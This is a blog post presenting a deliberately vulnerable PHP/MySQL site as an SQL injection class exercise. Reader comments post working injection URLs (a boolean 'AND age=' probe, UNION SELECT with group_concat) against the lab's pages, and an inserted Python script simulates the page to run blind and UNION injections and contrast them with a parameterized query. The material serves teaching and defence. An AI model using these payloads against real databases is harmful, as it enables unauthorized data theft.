Teach me SQL injection

Today I gave a SQL injection class at the VU University in Amsterdam. I created a website that is vulnerable to SQL injection and wanted to share the demo/assignment with you. Note that I have turned off magic_quotes_gpc (the PHP setting that backslash-escapes quotes in request data) to make life a little easier; it was never a real defence anyway, since an injection into a numeric parameter such as id needs no quote character at all. The assignment is to find out my age. If somebody has deleted the records from the database, you can reset it with the link below. One hint: it runs on a PHP5/MySQL5 environment.

Application: http://server.maussoft.com/~sqlinject/list.php

Reset DB: http://server.maussoft.com/~sqlinject/reset.php

Can you hack this application? Try to do it without looking at the source code. Prove it by posting a URL in the comments that injects SQL in such a way that the application shows my age. For the pros: try to do the same on safe1_view.php, safe2_view.php and insert.html/insert.php. If you can do the same on safe3_view.php or safe4_view.php, you are officially 1337 in my book…

Maurits

Comments

Comment from maurits
Time: April 20, 2009, 9:55

@Nahuel: Congratulations on the first two! Hint: you can use the “Firebug”, “Tamper Data” and “Web Developer Toolbar” add-ons for Firefox to help you with the others.

Comment from Simon
Time: May 12, 2009, 22:09

Third is also easy:

http://server.maussoft.com/~sqlinject/safe2_view.php?field=age&value=…test several values here

Not too hard when you know the result is an integer in the range ~17-70.

No idea for the last two, though.

Comment from Alex Turpin
Time: June 15, 2009, 21:36

http://server.maussoft.com/~sqlinject/view.php?id=1%20AND%20age=??

Trial and error ftw.

Comment from maurits
Time: June 15, 2009, 21:50

@alex: Well done!! Now that it got you interested, how about the tougher ones?

Comment from dmitri
Time: July 1, 2009, 19:37

These are very easy.

for safe2_view.php:
http://server.maussoft.com/~sqlinject/safe2_view.php?field=id%60%20=%20-1%20UNION%20SELECT%20age,%20age,%20age,age%20from%20users%20WHERE%20%60id&value=1

will pull the age if you get the right ID, which I’m presently too lazy to do.

Pingback from Teach me SQL Injection « Andrew Sellick
Time: June 1, 2010, 15:41

[…] If your knowledge is slightly light within the realms of SQL Injection this site could come in very handy: http://www.codingspace.org/2009/04/teach-me-sql-injection/ […]

Comment from Xtazy
Time: July 27, 2010, 23:23

Will this count for the first easy level?
Still learning :S
http://server.maussoft.com/~sqlinject/view.php?id=-1+union+all+select+1,group_concat%28age%29,3,4+from%20users/**/
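The two injection styles the commenters use, the boolean probe from Alex's comment (`?id=1 AND age=??`) and the UNION SELECT from dmitri's and Xtazy's comments, reproduced as an added example against a simulated copy of the vulnerable page. This is not code from the original demo, whose source is not on this page: it uses an in-memory SQLite database instead of MySQL 5, and the table layout (id, name, email, city, age), the two rows and the choice of name as the only rendered column are constructed assumptions. The parameterized variant at the end is there for contrast only and is not a claim about how the safe*_view.php pages are written.

```python
import sqlite3

# Constructed stand-in for the demo's database. The real table layout is not
# shown on the page, so these columns and rows are assumptions.
def build_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER, name TEXT, email TEXT, city TEXT, age INTEGER)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        (1, "maurits", "maurits@example.org", "Amsterdam", 31),
        (2, "nahuel", "nahuel@example.org", "Buenos Aires", 24),
    ])
    return conn

def view_vulnerable(conn, id_param):
    """Mimics a view.php that concatenates $_GET['id'] straight into the query.

    With magic_quotes_gpc off nothing is escaped, and since the parameter sits in
    a numeric context the payload needs no quote anyway. Only the name column is
    rendered, and age is never selected, so the attacker has to either infer the
    age from the page's yes/no behaviour or smuggle it into a displayed column.
    """
    sql = f"SELECT id, name, email, city FROM users WHERE id = {id_param}"
    return [row[1] for row in conn.execute(sql)]

def view_safe(conn, id_param):
    """Same page with the value bound as a parameter: it is data, never SQL."""
    sql = "SELECT id, name, email, city FROM users WHERE id = ?"
    return [row[1] for row in conn.execute(sql, (id_param,))]

def blind_find_age(page, lo=17, hi=70):
    """Boolean-based blind probe (Alex's trick): ?id=1 AND age=N renders the
    row only when N is right, so walk the plausible range and watch the page."""
    for n in range(lo, hi + 1):
        if page(f"1 AND age={n}"):
            return n
    return None

def union_dump_ages(page):
    """UNION-based (dmitri's and Xtazy's trick): id=-1 matches nothing, so the
    only row rendered is the one we append, with every age concatenated into
    the position of the displayed name column. The column count (4) must match
    the original SELECT, which is why the payload pads with 1, 3, 4."""
    rows = page("-1 UNION ALL SELECT 1, group_concat(age), 3, 4 FROM users")
    return rows[0] if rows else None

if __name__ == "__main__":
    conn = build_demo_db()
    vuln = lambda v: view_vulnerable(conn, v)
    safe = lambda v: view_safe(conn, v)
    print("normal page:", vuln("1"))
    print("blind probe finds age:", blind_find_age(vuln))
    print("union dump of all ages:", union_dump_ages(vuln))
    print("same payloads against the bound-parameter page:",
          blind_find_age(safe), union_dump_ages(safe))
```

Run it directly to see the normal page, the blind probe converging on the age, the UNION row carrying every age in the table, and both payloads coming back empty against the bound-parameter version. The hint in the post that the answer is an integer in a narrow range is what makes the blind probe cheap: at most 54 requests for 17-70. MySQL's GROUP_CONCAT returns the same comma-separated string as SQLite's group_concat, and the trailing /**/ in Xtazy's URL is an empty comment that MySQL simply ignores.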

Comment from Heni
Time: July 28, 2010, 10:11

Nothing to see
